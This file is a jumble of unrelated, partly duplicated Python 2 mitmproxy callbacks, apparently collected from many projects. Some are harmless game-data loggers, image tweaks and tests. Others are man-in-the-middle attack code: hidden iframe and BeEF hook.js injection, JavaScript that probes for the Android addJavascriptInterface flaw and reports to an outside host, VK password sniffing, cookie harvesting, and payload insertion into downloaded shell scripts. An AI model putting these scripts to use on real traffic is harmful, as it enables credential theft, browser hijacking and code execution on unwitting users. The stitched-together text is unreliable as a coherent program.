def handle_response(self, flow): # we only care about URLs that are going to FFRK_HOST if FFRK_HOST in flow.request.host: # get_battle_init_data call if BATTLE_INFO_PATH in flow.request.path: print flow.request.path + " called" with decoded(flow.response): json_data = json.loads(flow.response.content) print get_drops_from_json(json_data) if DUMP_CONTENT_TO_FILES: dump_json_to_file(json_data, BATTLE_INFO_FILENAME + get_suffix_with_unix_time()) # dff/party/list call elif EQUIPMENT_LIST_PATH in flow.request.path: print flow.request.path + " called" with decoded(flow.response): json_data = json.loads(flow.response.content) print get_equipment_id_from_json(json_data) if DUMP_CONTENT_TO_FILES: dump_json_to_file(json_data, EQUIPMENT_LIST_FILENAME + get_suffix_with_unix_time()) else: print flow.request.path + " called; no processing done\n" # forward the reply so it gets passed on flow.reply()
def handle_response(self, flow): print "request path is %s " % flow.request.path # If it's injectable and it's not the injected request requested_site = flow.request.headers["Host"][0] if flow.request.scheme.endswith("http") and requested_site.find( "www.fundacionsadosky.org.ar") == -1: visited_url = base64.b64encode(requested_site + flow.request.path) #taken from www.droidsec.org/tests/addjsif/ script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}''' content_type = flow.response.headers.get("Content-Type") if not content_type: content_type = flow.response.headers.get("Content-type") if content_type and "text/html" in content_type[0]: with decoded(flow.response ): # automatically decode gzipped responses. if flow.response.content: try: response = flow.response.content print "Response is " + response root = lxml.html.fromstring(response) if root.find('.//*') is not None: print "TRIED MODIFYING /html " + requested_site + flow.request.path # is HTML, use lxml to insert to head, body or script append_in = root.find('.//head') if append_in is None: append_in = root.find('.//body') elif append_in is None: append_in = root.find( './/script').getparent() else: append_in = root script = lxml.html.fromstring('<script>' + script + '</script>') if append_in is not None: append_in.append(script) flow.response.content = lxml.html.tostring( root) except: print "There was a problem parsing the html response, skip it" # mimetype may be application/javascript or text/javascript elif content_type and "javascript" in content_type[0]: with decoded(flow.response ): # automatically decode gzipped responses. print "TRIED MODIFYING /javascript " + requested_site + flow.request.path # is searching for library .JS (both cases sensitive) or JQUERY flow.response.content = script.encode( "utf-8") + flow.response.content Analyzer.handle_response(self, flow)
def handle_response(context, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) c = flow.response.replace( '<body>', '<body><iframe src="%s" frameborder="0" height="0" width="0"></iframe>' % context.iframe_url) if c > 0: context.log("Iframe injected!")
def response(context, flow): global db if flow.response.headers.get_first("content-type", "").startswith("image") and flow.request.pretty_host(hostheader=True).endswith("i.imgur.com"): with decoded(flow.response): # automatically decode gzipped responses. try: # Hash returned content for a key in redis content_hash = hashlib.md5(flow.response.content).hexdigest() # And check redis for said hash redis_response = r.get(content_hash) if redis_response == None: # Looks like we haven't served this image yet. # Inject us some data # Load image via PIL and cStringIO hackery imghandler = cStringIO.StringIO(flow.response.content) pillowbiter = Image.open(imghandler) # Inject text - you'll change this. s = stepic.encode(pillowbiter, "Image processing in Python is annoying.") # Create a cStringIO handler for stepic output resphandler = cStringIO.StringIO() # Write to it... s.save(resphandler, "png") # "Cache" the steg'd image in Redis r.set(content_hash, resphandler.getvalue()) # Now we're sure that this image exists in redis, return content flow.response.content = r.get(content_hash) flow.response.headers["content-type"] = ["image/png"] except Exception, e: # Unknown image types etc. pass
def response(context, flow): if (flow.request.path == "/rpc/playerUndecorated/getInventory"): with decoded(flow.response): try: data = json.loads(flow.response.content) except ValueError, e: return 0 items = data['gameBasket']['inventory'].__len__() #raise ValueError("length: %d " % items) if (items > 0): epoch_time = int(time.time()) name = "inv_%d.txt" % epoch_time summary = {} markermap = [] for item in data['gameBasket']['inventory']: object = inventory(item[2]) if object not in summary.keys(): summary[object] = 0 summary[object] += 1 f = open(name, 'w') for k1 in sorted(summary.keys()): #f.write(u'{0}:{1}\n'.format(k1,summary[k1])) out = k1 + ":" + str(summary[k1]) + "\n" f.write(out.encode("utf-8")) f.close()
def response(context, flow): if (flow.request.path == "/rpc/playerUndecorated/getInventory"): with decoded(flow.response): try: data = json.loads(flow.response.content) except ValueError, e: return 0 items = data['gameBasket']['inventory'].__len__() #raise ValueError("length: %d " % items) if (items > 0): epoch_time = int(time.time()) name = "keymap_%d.json" % epoch_time markermap = [] for item in data['gameBasket']['inventory']: marker = keymap(item[2],"#00a0a0") if marker is not None: markermap.append(marker) if 'resource' in item[2].keys(): resource = item[2]['resource']['resourceType'] if (resource == 'CAPSULE' or resource == 'INTEREST_CAPSULE'): capacity = item[2]['container']['currentCount'] capsuleItems = item[2]['container']['stackableItems'] if (capacity > 0): for itemc in capsuleItems: marker = keymap(itemc['exampleGameEntity'][2],"#a000a0") if marker is not None: markermap.append(marker) f = open(name,'w') f.write(json.dumps(markermap)) f.close()
def request(context, flow): try: with decoded(flow.request): # automatically decode gzipped responses. sourse_ip = str(flow.client_conn.address).split("'")[1] dest_ip = str(flow.request.host) #logging.debug("Sending (" + sourse_ip + " -> " + dest_ip + ")") pw_db.sniff_passwords(str(flow.request.content), sourse_ip, vk_db) # Regular vk result = vk_db.decode_request(str(flow.request.content)) if (result[0] == 2): flow.request.content = result[1] # vk App deauth result = vk_db.applet_deauth(str(flow.request.content), sourse_ip) if (result[0] == 2): flow.request.content = result[1] # vk mobile App result = vk_db.decode_java(str(flow.request.content)) if (result[0] == 2): flow.request.content = result[1] except Exception as e: # logging.debug("Exception in 'request':") # logging.debug(e) pass
def response(context, flow): try: url = flow.request.url if flow.request.host: host = flow.request.host else: host = "" context.f.write('\nreceive response: %s host:%s\n' % (flow.request.url, host)) with decoded(flow.response): # Automatically decode gzipped responses. if (not "Content-Type" in flow.response.headers) or \ len(flow.response.headers) == 0: return tp = flow.response.headers["Content-Type"][0].lower() context.f.write(' type:%s\n' % tp) if url.endswith('json'): return if "text/html" in tp: try: soup = BeautifulSoup(flow.response.content, "html5lib") except Exception as e: soup = BeautifulSoup(flow.response.content, 'lxml') if soup != None: tags = soup.find_all() for tag in tags: if 'src' in tag.attrs: context.f.write("src: %s\n" % tag['src']) elif 'SRC' in tag.attrs: context.f.write("src: %s\n" % tag['SRC']) try: flow.response.content = soup.prettify().encode('utf-8') context.f.write('successfully store new content\n') except Exception as e: context.f.write("error @response failed store new content exception: %s\n" \ %(str(e))) #analyzer.soup.head.insert(1, client_lib_node) #analyzer.soup.head.insert(1, esprima_node) #try: #flow.response.content = analyzer.soup.prettify().encode('utf-8') #context.f.write('newcontent:%s\n' %flow.response.content) #except Exception as e: #context.f.write(" encoding exception: %s\n" %(str(e))) #t3 = time() #t = (t3 - t2) * 1000 #context.f.write("REWRITE_TIME: %f ms\n" %(t)) #context.f.write(" new HTML:\n %s \n" %(flow.response.content) ) #else: #pass #context.f.write('NOT rewriting %s %s response\n' % (flow.request.url,\ # flow.response.headers["Content-Type"]) ) context.f.write('\n') except Exception as e: context.f.write('exception at %s for error: %s\n' % (url, str(e))) traceback.print_exc(file=context.f)
def response(context, flow): try: url = flow.request.url if flow.request.host: host = flow.request.host else: host = "" context.f.write('\nreceive response: %s host:%s\n'%(flow.request.url, host) ) with decoded(flow.response): # Automatically decode gzipped responses. if (not "Content-Type" in flow.response.headers) or \ len(flow.response.headers) == 0: return tp = flow.response.headers["Content-Type"][0].lower() context.f.write(' type:%s\n' %tp) if url.endswith('json'): return if "text/html" in tp: try: soup = BeautifulSoup( flow.response.content, "html5lib") except Exception as e: soup = BeautifulSoup( flow.response.content, 'lxml') if soup != None: tags = soup.find_all() for tag in tags: if 'src' in tag.attrs: context.f.write("src: %s\n" %tag['src']) elif 'SRC' in tag.attrs: context.f.write("src: %s\n" %tag['SRC']) try: flow.response.content = soup.prettify().encode('utf-8') context.f.write('successfully store new content\n') except Exception as e: context.f.write("error @response failed store new content exception: %s\n" \ %(str(e))) #analyzer.soup.head.insert(1, client_lib_node) #analyzer.soup.head.insert(1, esprima_node) #try: #flow.response.content = analyzer.soup.prettify().encode('utf-8') #context.f.write('newcontent:%s\n' %flow.response.content) #except Exception as e: #context.f.write(" encoding exception: %s\n" %(str(e))) #t3 = time() #t = (t3 - t2) * 1000 #context.f.write("REWRITE_TIME: %f ms\n" %(t)) #context.f.write(" new HTML:\n %s \n" %(flow.response.content) ) #else: #pass #context.f.write('NOT rewriting %s %s response\n' % (flow.request.url,\ # flow.response.headers["Content-Type"]) ) context.f.write('\n') except Exception as e: context.f.write('exception at %s for error: %s\n' %(url, str(e))) traceback.print_exc(file=context.f)
def response(context, flow): if flow.response.headers.get_first("content-type", "").startswith("image"): with decoded(flow.response): try: img = cStringIO.StringIO(open('xxx.jpg', 'rb').read()) flow.response.content = img.getvalue() flow.response.headers["content-type"] = ["image/jpeg"] except: pass
def handle_html(flow): global do_rick if do_rick: rick_iframe = """<script type="text/javascript" src="//google.com/rick_js"></script>""" with decoded(flow.response): flow.response.content = re.sub("<body(.*?)>", r"<body\1>" + rick_iframe, flow.response.content, count=1)
def response(context, flow): if flow.response.headers.get_first("content-type", "").startswith("image"): with decoded(flow.response): try: img = cStringIO.StringIO(open('freebuf.jpg', 'rb').read()) flow.response.content = img.getvalue() flow.response.headers["content-type"] = ["image/jpg"] except: pass
def request(context, flow): """ Callback fired upon each request thru the proxy """ if not _fuzz_requests: return try: if "Content-type" in flow.request.headers: if flow.request.headers["Content-type"][0].lower() in JSON_MIMES: with decoded(flow.request): flow.request.content = fuzz_json(flow.request.content) elif flow.request.headers["Content-type"][0].lower() in XML_MIMES: with decoded(flow.request): flow.request.content = fuzz_xml(flow.request.content) else: logging.debug("No fuzzers for content type '%s', skipping." % (flow.request.headers["Content-type"][0])) else: logging.debug("No Content-type header in request") except: logging.exception("Request callback threw an exception")
def response(context, flow): resp = flow.response req = flow.request with decoded(resp): if is_shell_script(resp) and is_cli_tool(req): flow.response.content = flow.response.content.replace( '\n', '\n' + context.payload + '\n', 1)
def request(context, flow): try: logging.debug("request") with decoded(flow.request): # automatically decode gzipped responses. logging.debug("new: ") s = cStringIO.StringIO(flow.request.content) logging.debug("haha " + str(s.getvalue())) except: logging.debug("CHECK CODE, IDIOT!!!!!!!!!!!")
def response(context, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: #print "This is the js:\n" + context.js javascript = html.new_tag("script") javascript.string = context.js html.body.insert(0, javascript) flow.response.content = str(html) context.log("Hooked JavaScript Functions.")
def puglify_image(context, flow): with decoded(flow.response): try: if flow.response.headers.get_first("content-type", "").startswith("image") or flow.response.content.startswith("\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00"): img = cStringIO.StringIO(open(os.path.normcase(os.path.dirname(inspect.stack()[0][1]) + '/pug.jpg'), 'rb').read()) flow.response.content = img.getvalue() flow.response.headers["content-type"] = ["image/jpeg"] except Exception, e: print "Error puglifying:" print repr(e)
def response(context, flow): with decoded(flow.response): # automatically decode gzipped responses. if flow.match(context.filter): print("=======================") print("Found a valid response!") print("=======================") with open("cap.json", "w") as myfile: myfile.write(flow.response.content) # save matching response as cap.json subprocess.call(["node", "story-decrypt.js"]) # call story-decrypt.js to fetch, decrypt, and save stories sys.exit(0)
def response(self, flow): with decoded(flow.response): inject_content = "" with open(self.content_path, 'r') as f: for line in f: inject_content += line flow.response.content = flow.response.content.replace("</body>", "<script>" + inject_content + "</script></body>")
def test_decoded(): r = tutils.treq() assert r.content == "content" assert not r.headers["content-encoding"] r.encode("gzip") assert r.headers["content-encoding"] assert r.content != "content" with decoded(r): assert not r.headers["content-encoding"] assert r.content == "content" assert r.headers["content-encoding"] assert r.content != "content" with decoded(r): r.content = "foo" assert r.content != "foo" r.decode() assert r.content == "foo"
def request(context, flow): ''' Callback fired upon each request thru the proxy ''' if not _fuzz_requests: return try: if 'Content-type' in flow.request.headers: if flow.request.headers['Content-type'][0].lower() in JSON_MIMES: with decoded(flow.request): flow.request.content = fuzz_json(flow.request.content) elif flow.request.headers['Content-type'][0].lower() in XML_MIMES: with decoded(flow.request): flow.request.content = fuzz_xml(flow.request.content) else: logging.debug("No fuzzers for content type '%s', skipping." % (flow.request.headers['Content-type'][0])) else: logging.debug("No Content-type header in request") except: logging.exception("Request callback threw an exception")
def response(context, flow): if flow.request.host in context.iframe_url: return with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: iframe = html.new_tag("iframe", src=context.iframe_url, frameborder=0, height=0, width=0) html.body.insert(0, iframe) flow.response.content = str(html) context.log("Iframe inserted.")
def test_decoded(): r = http_wrappers.HTTPRequest.wrap(netlib.tutils.treq()) assert r.content == "content" assert not r.headers["content-encoding"] r.encode("gzip") assert r.headers["content-encoding"] assert r.content != "content" with decoded(r): assert not r.headers["content-encoding"] assert r.content == "content" assert r.headers["content-encoding"] assert r.content != "content" with decoded(r): r.content = "foo" assert r.content != "foo" r.decode() assert r.content == "foo"
def response(context, flow): if flow.request.path == "/rpc/gameplay/getObjectsInCells": with decoded(flow.response): try: data = json.loads(flow.response.content) except ValueError, e: return 0 items = data["gameBasket"]["gameEntities"].__len__() # raise ValueError("length: %d " % items) if items > 0: epoch_time = int(time.time()) name = "mukm_0.txt" f = open(name, "a") for item in data["gameBasket"]["gameEntities"]: entity = item[2] if "capturedRegion" in entity.keys(): l1 = distanceGeoPoints( entity["capturedRegion"]["vertexA"]["location"], entity["capturedRegion"]["vertexB"]["location"], ) l2 = distanceGeoPoints( entity["capturedRegion"]["vertexB"]["location"], entity["capturedRegion"]["vertexC"]["location"], ) l3 = distanceGeoPoints( entity["capturedRegion"]["vertexA"]["location"], entity["capturedRegion"]["vertexC"]["location"], ) a = areaFromLength(l1, l2, l3) mukm = (int(entity["entityScore"]["entityScore"]) * 1.0) / a f.write("%s" % entity["capturedRegion"]["vertexA"]["location"]["latE6"]) f.write(",") f.write("%s" % entity["capturedRegion"]["vertexA"]["location"]["lngE6"]) f.write(":") f.write("%s" % entity["capturedRegion"]["vertexB"]["location"]["latE6"]) f.write(",") f.write("%s" % entity["capturedRegion"]["vertexB"]["location"]["lngE6"]) f.write(":") f.write("%s" % entity["capturedRegion"]["vertexC"]["location"]["latE6"]) f.write(",") f.write("%s" % entity["capturedRegion"]["vertexC"]["location"]["lngE6"]) f.write(":") f.write("%s" % a) f.write(":") f.write("%s" % entity["entityScore"]["entityScore"]) f.write(":") f.write("%s" % mukm) f.write("\n") f.close()
def response(context, flow): global HP global vulgarism # Hide profanity from webpages if (HP): with decoded(flow.response): #print flow.response.content for i in vulgarism: repl = re.compile(re.escape(i), re.IGNORECASE) flow.response.content = repl.sub('***', flow.response.content)
def response(context, flow): if flow.request.pretty_host(hostheader=True).startswith("quizserver.feomedia.se"): print("QF-Response") if "qf_games" in flow.request.path: with decoded(flow.response): questionResponses = (flow.response.content) h = HTMLParser.HTMLParser() questionResponses = h.unescape(questionResponses) modifiedQuestionResponses = modifyQuestionResponses(questionResponses) if (modifiedQuestionResponses): flow.response.content = cgi.escape(modifiedQuestionResponses, True);
def handle_response(self, flow): with decoded(flow.response): print flow.request.url import re if 'courseAction!toCourseVideo' in flow.request.url: flow.response.content = re.sub("eval\(function.*?onStopMove\|mouseHander\|intervalTime\|function\|eryaPlayer.*?\)\,0\,\{\}\)\)",'',flow.response.content) flow.response.content = flow.response.content.replace('pauseMovie','playMovie') print flow.response.content if 'playerAction!getResourceUrl' in flow.request.url: flow.response.content =re.sub(r'\"startTime\"\:(\d+)','"startTime":10',flow.response.content) flow.reply()
def handle(self, flow, args): if not flow.request.pretty_host(hostheader=True).endswith(self._host): return r = str(flow.request.path).replace("/", "-") rq_path = r[1:] if args.verbosity >= 1: t = os.getcwd() + "/api_calls.txt" # if not os.access(p, os.F_OK): # os.mkdir(p) # data_path = p + str(flow.request.path) + "_" + time.strftime("%m%d%Y-%H%M%S") + ".json" t_file = open(t, 'a') print flow.request.path print >> t_file, flow.request.path # # print >> test_file, json.dumps(data, indent=4, sort_keys=True) t_file.close() # print flow.request.path # print if self.should_ignore(flow.request.path): return with decoded(flow.response): handlers = self.get_handlers(flow.request.path) if handlers: data = json_decode(flow.response.content) if args.verbosity >= 2: p = os.getcwd() + "/data_dump/" + rq_path + "/" if not os.access(p, os.F_OK): os.mkdir(p) data_path = p + rq_path + "_" + time.strftime("%m%d%Y-%H%M%S") + ".json" test_file = open(data_path, 'w') print >> test_file, json.dumps(data, indent=4, sort_keys=False) test_file.close() # test_file = open(data_path, 'w') # print >> test_file, json.dumps(data, indent=4, sort_keys=False) # test_file.close() # # print dump_json(data) for func in handlers: if func in self._wants_flow: func(data, flow) else: func(data) else: if args.verbosity >= 3: data = json_decode(flow.response.content) p = os.getcwd() + "/data_dump/" + rq_path + "/" if not os.access(p, os.F_OK): os.mkdir(p) data_path = p + rq_path + "_" + time.strftime("%m%d%Y-%H%M%S") + ".json" test_file = open(data_path, 'w') # print >> test_file, "//" + str(flow.request.path) print >> test_file, json.dumps(data, indent=4, sort_keys=False) test_file.close()
def handle_response(self, flow): print "request path is %s " % flow.request.path # If it's injectable and it's not the injected request requested_site = flow.request.headers["Host"][0] if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1: visited_url = base64.b64encode(requested_site + flow.request.path) #taken from www.droidsec.org/tests/addjsif/ script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}''' content_type = flow.response.headers.get("Content-Type") if not content_type: content_type = flow.response.headers.get("Content-type") if content_type and "text/html" in content_type[0]: with decoded(flow.response): # automatically decode gzipped responses. if flow.response.content: try: response = flow.response.content print "Response is "+response root = lxml.html.fromstring(response) if root.find('.//*') is not None: print "TRIED MODIFYING /html " + requested_site+ flow.request.path # is HTML, use lxml to insert to head, body or script append_in = root.find('.//head') if append_in is None: append_in = root.find('.//body') elif append_in is None: append_in = root.find('.//script').getparent() else: append_in = root script = lxml.html.fromstring('<script>' + script + '</script>') if append_in is not None: append_in.append(script) flow.response.content = lxml.html.tostring(root) except: print "There was a problem parsing the html response, skip it" # mimetype may be application/javascript or text/javascript elif content_type and "javascript" in content_type[0]: with decoded(flow.response): # automatically decode gzipped responses. print "TRIED MODIFYING /javascript " + requested_site + flow.request.path # is searching for library .JS (both cases sensitive) or JQUERY flow.response.content = script.encode("utf-8") + flow.response.content Analyzer.handle_response(self,flow)
def response(context, flow): #if flow.request.host in context.src_url: #return # Make sure JS isn't injected to itself with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content,fromEncoding='latin-1') #html = BeautifulSoup(flow.response.content) if html.body: script = html.new_tag( "script", type='application/javascript') script.string="alert(2);" html.body.insert(0, script) flow.response.content = str(html.prettify('latin-1')) context.log("Script injected.")
def response(context, flow): try: with decoded(flow.response): # automatically decode gzipped responses. result = vk_db.decode_response(str(flow.response.content)) if (result[0] == 2): flow.response.content = result[1] except Exception as e: # logging.debug("Exception in 'response':") # logging.debug(e) pass
def response(context, flow): #if flow.request.host in context.src_url: #return # Make sure JS isn't injected to itself with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content, fromEncoding='latin-1') #html = BeautifulSoup(flow.response.content) if html.body: script = html.new_tag("script", type='application/javascript') script.string = "alert(2);" html.body.insert(0, script) flow.response.content = str(html.prettify('latin-1')) context.log("Script injected.")
def response(context, flow): context.log(flow.response.headers["content-type"]) if flow.request.pretty_host(hostheader=True).endswith(DOMAIN) and \ "text/html" in flow.response.headers["content-type"]: with decoded(flow.response): html = BeautifulSoup(flow.response.content) if html.body: div = html.new_tag("div") div.string = MESSAGE html.body.insert(0, div) flow.response.content = str(html) context.log("div inserted")
def response(context, flow): if flow.response.headers.get_first("content-type", "").startswith("image"): with decoded(flow.response): # automatically decode gzipped responses. try: s = cStringIO.StringIO(flow.response.content) img = Image.open(s).rotate(180) s2 = cStringIO.StringIO() img.save(s2, "png") flow.response.content = s2.getvalue() flow.response.headers["content-type"] = ["image/png"] except: # Unknown image types etc. pass
def request(context, flow): try: f = context.duplicate_flow(flow) with decoded(flow.request): # automatically decode gzipped responses. replay, new_content = mail_db.get_email(str(flow.request.content)) if replay: f.request.content = str(new_content) context.replay_request(f) except Exception as e: # logging.debug(e) pass
def response(self, flow): pass if "text/html" in flow.response.headers['Content-Type'][0]: with decoded(flow.response): for item, v in self.config[self.name]['regex'].iteritems(): #if v.split("||")[0] in flow.request.host and self.theFlag == False: str_search = v.split("||")[0] str_replace = v.split("||")[1] if str_search in flow.response.content: flow.response.content = flow.response.content.replace(str_search, str_replace) logger.debug("["+self.name+"] " + str_search + " to " + str_replace + " in " + flow.request.host)
def response(context, flow): with decoded(flow.response): # automatically decode gzipped responses. headers = flow.request.headers host = headers.get('Host') cookies = headers.get('Cookie') print(cookies) if host ==None or cookies ==None: return True with open('savecookies','a') as f: f.write(','.join(host)) f.write("\n") f.write(';'.join(cookies)) f.write("\n\n")
def response(context, flow): """ Read request body from /load resource and tamper temperature value. NOT TESTED YET! """ request_url = flow.request.pretty_url(hostheader=True) if 'load' in request_url: with decoded(flow.response): body = json.loads(flow.response.content) if body.get('value'): body['value'] = 100 flow.response.content = json.dumps(body)
def handle_response(self, flow): with decoded(flow.response): print flow.request.url import re if 'moocplayer.js' in flow.request.url: flow.response.content = re.sub(r'(MoocPlayer.prototype.switchWindow.*?)\/\*','/*',flow.response.content,flags=re.DOTALL) if 'initdatawithviewer' in flow.request.url: flow.response.content =re.sub(r'\"startTime\"\:(\d+)','"startTime":10',flow.response.content) jsonData = json.loads(flow.response.content) print "问题:",jsonData[0]["datas"][0]["description"],"答案:", for i in jsonData[0]["datas"][0]["options"]: if i["isRight"]: print i["description"] flow.reply()
def response(context, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ print len(flow.response.headers["referer"]) if html.body and ('text/html' in flow.response.headers["content-type"][0]) and len(flow.response.headers["referer"]) == 0: script = html.new_tag( "script", src=context.src_url) html.body.insert(0, script) flow.response.content = str(html) context.log("******* Filter Injected *******")
def response(context, flow): if (flow.request.path == "/rpc/gameplay/getObjectsInCells"): with decoded(flow.response): try: data = json.loads(flow.response.content) except ValueError, e: return 0 items = data['gameBasket']['gameEntities'].__len__() #raise ValueError("length: %d " % items) if (items > 0): epoch_time = int(time.time()) name = "mukm_0.txt" f = open(name, 'a') for item in data['gameBasket']['gameEntities']: entity = item[2] if 'capturedRegion' in entity.keys(): l1 = distanceGeoPoints(entity['capturedRegion']['vertexA']['location'],entity['capturedRegion']['vertexB']['location']) l2 = distanceGeoPoints(entity['capturedRegion']['vertexB']['location'],entity['capturedRegion']['vertexC']['location']) l3 = distanceGeoPoints(entity['capturedRegion']['vertexA']['location'],entity['capturedRegion']['vertexC']['location']) a = areaFromLength(l1,l2,l3) mukm = (int(entity['entityScore']['entityScore']) * 1.0) / a f.write("%s" % entity['capturedRegion']['vertexA']['location']['latE6']) f.write(",") f.write("%s" % entity['capturedRegion']['vertexA']['location']['lngE6']) f.write(":") f.write("%s" % entity['capturedRegion']['vertexB']['location']['latE6']) f.write(",") f.write("%s" % entity['capturedRegion']['vertexB']['location']['lngE6']) f.write(":") f.write("%s" % entity['capturedRegion']['vertexC']['location']['latE6']) f.write(",") f.write("%s" % entity['capturedRegion']['vertexC']['location']['lngE6']) f.write(":") f.write("%s" % a) f.write(":") f.write("%s" % entity['entityScore']['entityScore']) f.write(":") f.write("%s" % mukm) f.write("\n") f.close()
def response(context, flow): if flow.response.headers.get_first("content-type", "").startswith("text/html"): with decoded(flow.response): # automatically decode gzipped responses. # context.log("Type " + str(type(flow.response.content))) html = BeautifulSoup(flow.response.content) if html.head: # https should be considered script = html.new_tag("script", src=flow.request.scheme + "://10.0.0.1:3000/hook.js", type="text/javascript") html.head.append(script) #context.log(html.head) flow.response.content = str(html) context.log("Beef hook inserted.")
def response(context, flow): overrideData = getOverrideData() with decoded(flow.response): # automatically decode gzipped responses. url = flow.request.scheme + "://" + flow.request.host + flow.request.path newResponseContent = "" urlMatches = False for urlData in overrideData: urlMatches, freeVars = match(urlData[0], url) if urlMatches: filePath = matchReplace(urlData[0], urlData[1], url) newResponseContent = tryToReadFile(filePath, urlData) break if urlMatches: flow.response.code = 200 flow.response.content = newResponseContent
def response(context, flow): #Process request requestAttrs = [ "method", "scheme", "host", "port", "path", "httpversion", "headers", "content", "form_in", "timestamp_start", "timestamp_end" ] requestDict = {} requestDict['date-sent'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S") #Build HTTPRequest dict with decoded data with decoded(flow.request): for attr in requestAttrs: try: if attr == "content": # unocnt = unicode(flow.request.content, errors="xmlcharrefreplace", encoding="utf8") requestDict[attr] = flow.request.content else: requestDict[attr] = str(getattr(flow.request, attr)) except Exception, e: requestDict[attr] = str(e)
def response(context, flow): if (flow.request.path == "/rpc/playerUndecorated/getInventory"): with decoded(flow.response): try: data = json.loads(flow.response.content) except ValueError, e: return 0 items = data['gameBasket']['inventory'].__len__() #raise ValueError("length: %d " % items) if (items > 0): epoch_time = int(time.time()) name = "keymap_%d.json" % epoch_time markermap = [] for item in data['gameBasket']['inventory']: marker = keymap(item[2], "#00a0a0") if marker is not None: markermap.append(marker) if 'resource' in item[2].keys(): resource = item[2]['resource']['resourceType'] if (resource == 'CAPSULE' or resource == 'INTEREST_CAPSULE'): capacity = item[2]['container']['currentCount'] capsuleItems = item[2]['container'][ 'stackableItems'] if (capacity > 0): for itemc in capsuleItems: marker = keymap( itemc['exampleGameEntity'][2], "#a000a0") if marker is not None: markermap.append(marker) f = open(name, 'w') f.write(json.dumps(markermap)) f.close()
def response(context, flow): if (flow.request.path == "/rpc/playerUndecorated/getInventory"): with decoded(flow.response): try: data = json.loads(flow.response.content) except ValueError, e: return 0 items = data['gameBasket']['inventory'].__len__() #raise ValueError("length: %d " % items) if (items > 0): epoch_time = int(time.time()) name = "time_%d.txt" % epoch_time f = open(name, 'w') for item in data['gameBasket']['inventory']: object = inventory(item[2]) ptime = formatms(item[1]) out = u'{1}:{0}\n'.format(ptime, object) f.write(out.encode("utf-8")) if 'resource' in item[2].keys(): resource = item[2]['resource']['resourceType'] if (resource == 'CAPSULE' or resource == 'INTEREST_CAPSULE'): capacity = item[2]['container']['currentCount'] capsuleItems = item[2]['container'][ 'stackableItems'] capser = item[2]['moniker']['differentiator'] if (capacity > 0): for itemc in capsuleItems: object = inventory( itemc['exampleGameEntity'][2]) # #ptime=formatms(itemc[1]) out = u'{1}:{0}\n'.format(capser, object) f.write(out.encode("utf-8")) f.close()
def response(context, flow): if flow.response.headers.get_first("content-type", "").startswith("text"): with decoded(flow.response): # automatically decode gzipped responses. soup = BeautifulSoup(flow.response.content, 'lxml') for img in soup("img"): try: src = img['src'] if src[0:4] != "http": src = "http:" + img['src'] print src if src.find(".jpg") > 0 or src.find(".jpeg") > 0: chain = jp2a[src] else: chain = curl['-sS', src] | convert['-', 'jpg:-'] | jp2a['-'] ascii_paragraph = soup.new_tag("p") ascii_paragraph['style'] = css ascii_paragraph.string = chain() img.replace_with(ascii_paragraph) except: img.replace_with("IMAGE") flow.response.content = str(soup)
def handle_response(self, flow): if flow.response.code == 200: # avoid decoding into .js files (beautifulSoup has a bug that encode HTML chars # so for example 'if bla && bla' becomes 'if bla && bla') if (flow.response.headers['Content-Type']) and (len( flow.response.headers['Content-Type']) != 0): if not 'application/javascript' == flow.response.headers[ 'Content-Type'][0]: with decoded(flow.response ): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: #javascript = html.new_tag("script", src="http://127.0.0.1:8889/JavaScriptHooks_new_arch.js") javascript = html.new_tag("script") if self.INJECT_BY_TAG: javascript["src"] = "http://127.0.0.1:" + str( JS_SERVING_PROXY_PORT ) + "/JavaScriptHooks_new_arch.js" else: javascript.string = self.script html.body.insert(0, javascript) flow.response.content = str(html) print "JavaScript Functions Hooked.\n" flow.reply()
requestDict[attr] = str(getattr(flow.request, attr)) except Exception, e: requestDict[attr] = str(e) #Process response responseAttrs = [ "httpversion", "msg", "headers", "content", "timestamp_start", "timestamp_end" ] responseDict = {} responseDict['date-received'] = datetime.now().strftime( "%Y-%m-%d %H:%M:%S") #Build HTTPResponse dict with decoded data with decoded(flow.response): for attr in responseAttrs: try: if attr == "content": responseDict[attr] = flow.response.content else: responseDict[attr] = str(getattr(flow.response, attr)) except Exception, e: responseDict[attr] = str(e) #Redirect messages to appropaite destinations redirect(requestDict, responseDict, context.endpoint) ''' This method receives an HTTPRequest dict and a HTTPResponse dict, reads its headers and redirects it to the corresponding processor.
def response(context, flow): if(context.scan_responses): with decoded(flow.response): # automatically decode gzipped responses. process_string(context, flow.response.content, flow)
def response(ctx, flow): with decoded(flow.response): # automatically decode gzipped responses. flow.response.content = flow.response.content.replace(ctx.old, ctx.new)
